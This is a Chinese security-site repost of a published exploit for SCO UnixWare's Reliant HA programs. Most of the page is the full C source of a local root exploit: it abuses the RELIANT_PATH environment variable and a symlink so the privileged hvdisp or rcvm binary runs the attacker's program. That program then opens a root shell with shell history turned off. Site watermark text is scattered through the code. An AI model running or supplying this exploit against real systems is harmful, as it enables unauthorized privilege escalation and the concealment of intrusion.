网管联盟 | 网管论坛 | 网管u家 | 网管博客 | 网管软件 | 网管求职 | 小游戏 | 网管搜索 | 网管原创 | 网管聚合 | 网管读摘 | 网管焦点 | 世界素材 | 会员投稿 | 会员中心 
中国网管联盟
Windows Linux Cisco 网络技术 数据库 黑客攻防 DotNet Java PHP 认证 新闻资讯 服务器 存储资讯 网络设备 网管学堂 技术专题 焦点 网吧频道
 当前位置: > bitsCN.com > 网络攻防 > 黑客技术 > Exploit > SCO UnixWare Reliant HA Local Root (Exploit)  

SCO UnixWare Reliant HA Local Root (Exploit)

2008-04-07  作者:bitsCN整理  来源:中国网管联盟  点评 投稿 收藏

Summary
A vulnerability in SCO UnixWare's Reliant HA program allows local attackers to overflow an internal buffer in the program causing it to execute arbitrary code.
 
Credit:
The information has been provided by qaaz.
The original article can be found at: http://www.milw0rm.com/exploits/5356 网管朋友网www_bitscn_net

 
 
 Details
Audit your web server for security holes - see what the hackers see.
Sign up for a scan today - risk free!
Exploit:
/* 04/2008: public release
 * I have'nt seen any advisory on this; possibly still not fixed.
 *
 * SCO UnixWare Reliant HA Local Root Exploit
 * By qaaz
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <fcntl.h>

网管网www_bitscn_com

#define TGT1 "/usr/opt/reliant/bin/hvdisp"
#define TGT2 "/usr/opt/reliant/bin/rcvm"
#define DIR "bin"
#define BIN DIR "/hvenv" 网管有家bitscn.net

int main(int argc, char *argv[])
{
 char self[4096], *target;
 pid_t child; 网管下载dl.bitscn.com

 if (geteuid() == 0) {
  setuid(geteuid());
  dup2(3, 0);
  dup2(4, 1);
  dup2(5, 2);
  if ((child = fork()) == 0) {
   putenv("HISTFILE=/dev/null");
   execl("/bin/sh", "sh", "-i", NULL);
   printf("[-] sh: %s\n", strerror(errno));
  } else if (child != -1)
   waitpid(child, NULL, 0);
  kill(getppid(), 15);
  return 1;
 }

网管u家bitscn.net

 printf("----------------------------------------\n");
 printf(" UnixWare Reliant HA Local Root Exploit\n");
 printf(" By qaaz\n");
 printf("----------------------------------------\n");

网管bitscn_com

 if (access(TGT1, EX_OK) == 0)
  target = TGT1;
 else if (access(TGT2, EX_OK) == 0)
  target = TGT2;
 else {
  printf("[-] No targets found\n");
  return 1;
 } 中国网管联盟bitsCN.com

 sprintf(self, "/proc/%d/object/a.out", getpid());

网管bitscn_com

 if (mkdir(DIR, 0777) < 0 && errno != EEXIST) {
  printf("[-] %s: %s\n", DIR, strerror(errno));
  return 1;
 } 网管有家bitscn.net

 if (symlink(self, BIN) < 0) {
  printf("[-] %s: %s\n", BIN, strerror(errno));
  rmdir(DIR);
  return 1;
 }

网管u家u.bitscn@com

 if ((child = fork()) == 0) {
  char path[4096] = "RELIANT_PATH="; 中国网管论坛bbs.bitsCN.com

  dup2(0, 3);
  dup2(1, 4);
  dup2(2, 5);
  putenv(strcat(path, getcwd(NULL, sizeof(path)-14)));
  execl(target, target, NULL);
  printf("[-] %s: %s\n", target, strerror(errno));
  return 1;
 } else if (child != -1)
  waitpid(child, NULL, 0);

网管联盟bitsCN_com

 unlink(BIN);
 rmdir(DIR);
 return 0;
}
 

网管联盟bitsCN@com


TAGs         "   if   printf   n"   <   child   DIR   #include      
 上一篇:SCO UnixWare Merge mcd Local Root (Exploit)   下一篇:SCO UnixWare pkgadd Local Root (Exploit)
相关文章列表
SCO UnixWare Reliant HA Local Root (Exploit) 评论:
loading.. 评论加载中…
评论:请自觉遵守互联网相关政策法规,评论不得超过250字。

验证码: 注册用户
本类热门排行:
1.Scripteen Free Image Hosting Script 1.
2.PPMate PPMedia Class ActiveX Control B
3.Apache mod_jk 1.2.19 Remote Buffer Ove
4.Microsoft Access (Snapview.ocx 10.0.55
5.Cisco IOS 12.3(18) FTP Server Remote E
6.Trend Micro OfficeScan ObjRemoveCtrl A
7.Windows Media Encoder wmex.dll ActiveX
8.Linux Kernel <= 2.6.20 with DCCP Su
9.NaviCOPA Web Server 2.01 Remote Buffer
10.Simple Machines Forum <= 1.1.5 Admi
最新推荐文章:
1.Cheats Complete Website 1.1.1 (itemid)
2.Drinks Complete Website 2.1.0 (drinkid
3.BitDefender Online Scanner 8 ActiveX H
4.PHP < 4.4.5 / 5.2.1 (shmop) SSL RSA
5.PHP COM extensions (inconsistent Win32
6.PHP 4.4.6 crack_opendict() Local Buffe
7.Internet Explorer ActiveX bgColor Prop
8.CVSTrac 2.0.0 Post-Attack Database Res
9.GuppY <= 4.5.16 Remote Commands Exe
10.Trend Micro VirusWall Buffer Overflow
网管论坛交流:
·什么样的游戏,什么样的爱情.
·大家来开心一下吧---看了会很开心的东西-
·中国人不可不知道的知识
·@@小鹏◎◎小鹏同志与某位女明星亲密接触
·◎◎小鹏◎◎发现不明生物,居然正在交配
·[图文]^^^版主是什么?????
·泡论坛的女人是好女人
·做个“水性杨花”的女人
·献给mm俱乐部的所有mm
·深圳一集团企业电脑基础应用培训教程